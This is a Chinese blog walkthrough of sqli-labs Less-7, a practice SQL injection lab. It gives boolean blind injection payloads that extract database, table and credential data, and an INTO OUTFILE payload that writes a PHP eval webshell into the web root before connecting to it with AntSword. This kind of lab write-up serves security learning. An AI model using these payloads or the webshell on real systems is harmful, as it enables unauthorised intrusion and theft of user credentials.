【Try to Hack】sql注入 Less7 (into outfile和布尔盲注)

最新推荐文章于 2022-10-18 21:21:32 发布
最新推荐文章于 2022-10-18 21:21:32 发布
阅读量616 收藏 1
点赞数
分类专栏: SQL注入 文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55675216/article/details/125878904
版权

📒博客主页:开心星人的博客主页
🔥系列专栏:Try to Hack
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年7月19日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!

📌导航小助手📌

🍫判断闭合方式

?id=1
在这里插入图片描述
?id=1’
在这里插入图片描述
加单号会报错,但是没有告诉我们具体的报错信息,所以无法使用报错注入

发现使用?id=1"?id=1")?id=1")) 不会报错
发现使用?id=1'?id=1')?id=1')) 会报错

不会报错的直接不看,肯定不是那种闭合方式
然后测试 ?id=1'--+?id=1')--+?id=1'))--+

?id=1’))--+没有报错,所以闭合方式为’))

🍫布尔盲注

根据上面所述的,会有报错和不报错两种情况,所以就是bool型的
?id=1')) and 1=1--+ 不报错
?id=1')) and 1=2--+ 报错

?id=1')) and length(database())=8--+ 获取数据库长度
?id=1')) and substr(database(),1,1)='s'--+ 获取数据库第一个字符
?id=1')) and ascii(substr(database(),1,1))=115--+ 获取数据库第一个字符
?id=1')) and substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)='e'
获取数据库第一张表名的第一个字符
?id=1')) and substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)='i'--+ 获取security数据库中users表中第一个字段的第一个字符
?id=1')) and ascii(substr((select concat_ws(',',username,password) from security.users limit 0,1),1,1))=68--+ 获得security数据库中users表中的第一个数据的第一个字符

🍫into outfile写入小马

首先数据库得要有写权限
【Try to Hack】udf提权,有提到

对文件进行导入导出首先得要有足够的权限,
但是mysql默认不能导入和导出文件,这与secure_file_priv的值有关(默认为null)
secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。
1、当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
2、当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
3、当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
用以下命令查看secure_file_priv的值
show variables like ‘%secure%’;

D:\phpstudy_pro\Extensions\MySQL5.7.26\my.ini 加上secure_file_priv="/"
在这里插入图片描述

?id=1')) order by 4--+ 查字段 , into outfile的时候需要知道字段数目
在这里插入图片描述
报错了很容易知道字段数为3

使用@@datadir来查询数据库的路径,可以使用上一步中提到的盲注来获得路径

写入文件路径为
D:\phpstudy_pro\WWW\sqli-labs-master\Less-7

需要对反斜线进行转义 D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7

?id=-1')) union select 1,2,'<?php @eval($_POST["admin"])?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--+
写入一个小马

用蚁剑去连接
在这里插入图片描述
在这里插入图片描述

🍫直接into outfile导出数据库名称、表名、字段名、数据值

?id=-1')) union select 1,user(),database() into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.txt' --+
在这里插入图片描述

会显示报错,但是已经能够查看了
在这里插入图片描述
?id=-1')) union select 1,2,table_name from information_schema.tables where table_schema='security' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\3.txt'--+
在这里插入图片描述
?id=-1')) union select 1,2,column_name from information_schema.columns where table_schema='security' and table_name='users' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\4.txt'--+
在这里插入图片描述

?id=-1')) union select 1,username,password from users into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\5.txt'--+
在这里插入图片描述

很多内容来自这篇

开心星人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labs-master第七关Less-7超详细360°无死角教程
hih30250的博客
11-25 1100
不带参数请求页面:可以看到,页面让我们输入id,我们输入一个?id=1作为参数:可以看到给出了正常的数据。我们再输入一个不存在的id参数?id=999可以看到页面给出SQL语句语法错误。
sql注入之into outfile
ljj20020718的博客
11-25 2426
sql注入之into outfile
sqlilabs—less7
一个普普通通的博客
03-24 2561
sqlilabs—less7
SQL注入——into outfile的使用
weixin_54217950的博客
02-16 4673
数据库中into outfile语句把表数据导出到一个文本文件中,那么利用这个语句,再配合满足的‘三个条件’,即可实现文件或者一句话木马导入到数据库文件的目录中。 三个条件: 1.具有root权限。 2.在数据库配置文件中的 配置项含有:secure_file_priv=''。(注意在数据库中此项默认为secure_file_priv=null)。 3.知道数据库的绝对路径。 注意:由于满足条件十分苛刻,所以很难实现。 例子 导入文件命令:http://127.0.0.1/sqli-labs-maste
sql注入系列课程
10-14
本课程是sql注入系列课程,从最基础的sql注入语法讲起,里面包含常见数据库sql注入方法,及各种类型的sql注入,通过sql注入直接获取服务器权限等攻击方法及演示。
用SELECT… INTO OUTFILE语句导出MySQL数据的教程
12-15
在MySQL中,SELECT… INTO OUTFILE语句是一个非常实用的功能,用于将查询结果直接导出到服务器主机上的文件。这个语句将数据以特定的格式保存,方便进行数据备份、迁移或者进一步处理。以下是关于使用SELECT… INTO ...
SQL 注入天书.pdf
08-06
Less-5和Less-6进一步阐述了基于时间的盲注和基于布尔值的盲注,以及如何利用它们来提取数据库信息。 **更高级的挑战** 随着挑战难度的提升,学习者将接触到更复杂的注入技术,如联合查询注入、堆叠查询注入、 ...
outfile.sql
最新发布
09-05
outfile.sql
利用SQL注入漏洞拖库的方法
09-11
例如,正常的查询是`SELECT * FROM article WHERE articleid='1'`,但攻击者可以构造如`' INTO OUTFILE 'e:/sql.txt'`这样的字符串,使得SQL语句变成`SELECT * FROM article WHERE articleid='1' INTO OUTFILE 'e:/...
Mysql注入中的outfile、dumpfile、load_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysqlfile系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们...
Sqli-labs之Less-7
→_→
03-26 1611
Less-7 GET - 导入文件- 字符串 分析数字型/字符型及单/双引号注入: 我们可以分别尝试将 ?id=1 ?id=1' ?id=1"添加到url中,进行测试,发现?id=1'报错,初步判断为字符型注入,经过测试后发现正常返回 You are in.... U...
sql注入】Less5-7详解
lyy0xfff的博客
07-13 886
SQL注入Less-5Less-6Less-7 Less-5 0x00 首先根据题意我们输入参数id=1,和id=-1看看页面的回显情况 我们发现当它执行的SQL语句正确时,页面返回You are in,当sql语句执行不正确时,返回为空,且并没有回显位置,这就是我们所说的盲注,具体什么时盲注可以看我之前的文章基于布尔类型、时间类型的盲注 0x01 Less-6 Less-7 ...
Sqli-libs(Less7~Less23)通关详解,通篇大白话,看完不懂直接v你50吃KFC
henghengzhao_的博客
10-18 1188
大白话讲解,通篇写的是我做题的一个思路,建议先了解一下sql注入的基本原理再来看,主要针对人群,sql注入初学者,来刷sqli-libs靶场但是感觉吃力的。看完要还是不会,来来来,评论区留言,我v你50吃个KFC
SQL注入】Less-7导出文件GET字符型注入
Mitchell_Donovan的博客
03-30 373
Less-7导出文件GET字符型注入 什么是导出文件? 1、在本实验开始的0x2 sql注入基础知识就有介绍LOAD_FILE的用法,大家可以翻回去看看!另外在构建环境之初,由于是Linux系统,对这个目录的权限控制的很严谨。 2、所以在我们的payload中只能在/home/wwwroot/default/mysql才能写入或者读取文件!因为mysql目录的权限我们设置chowm -R mysql:mysql 3、另外要保证正常的文件写入与读取要在mysql配置文件my.cnf最后一行新增secur
Sqli-labs 复习 Less07 文件型注入 - GET
kevinhanser
08-11 462
之前学习了一遍 sqli-labs,这是巩固复习一遍,代码全部手敲,加深印象 Sqli-labs 博客目录 文件型注入 函数讲解 1. load_file()导出文件 简介 load_file(file_name): 读取文件并返回该文件的内容作为一个字符串。 使用条件 必须有权限读取并且文件必须完全可读 and (select count() from m...
SQL注入天书SQLi-LABS(Less1-7)
网络猿的博客
01-15 1139
SQL注入天书SQLi-LABS(Less1-7) 往期回顾: SQLi-LABS搭建教程:SQL注入天书(SQLi-LABS)搭建 文章目录SQL注入天书SQLi-LABS(Less1-7)一、SQL注入天书SQLi-LABS(一)Less-1(二)Less-2(三)Less-3(三)Less-4(三)Less-5(三)Less-6(三)Less-7 一、SQL注入天书SQLi-LABS (一)Less-1 1、http://127.0.0.1/sqli-labs/Less-1/?id=1’ o
SQLi-Labs Less7-Less10
KRDecad3的博客
11-13 625
Less-7-GET-Dump into outfile-String 考查into outfile写入文件 输入id=1 输入id=1'报错 输入id=1"不报错,说明是单引号 输入id=1'--+报错,那么再试试id=1')--+还报错,再试试id=1'))--+正常,由此判断查询语句的参数是(('$_GET[id]'))的形式。 使用into outfile写入一句话: 输入id=-...
sqli-labs Less-7 Dump into outfile sql注入读写文件
bigblue00的博客
06-16 1685
Less-7 Dump into outfile sql注入读写文件 SQL语句只要正确就会输出 You are in … 错误就会输出You have an error in your SQL syntax 本例主要练习SQL注入读写文件 1、先了解一个语句: into outfile 语句用于把表数据导出到一个文本文件中 要想mysql用户对文件进行导入导出,首先要看指定的权限目录 mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE,
报错注入邂逅load_file&into outfile搭讪LINES
3569
07-25 1375
https://xz.aliyun.com/t/2460 0x00 前言 近期分析mysql利用报错注入读取文件内容,利用LINES TERMINATED BY在查询只返回一个字段时写webshell文件,以及如何利用load_file扫描判断文件是否存在。 0x01 into outfile写文件 要求用户具有file权限 文件不能覆盖写入,所以文件必须为不存在 如果secure_f...
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

开心星人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值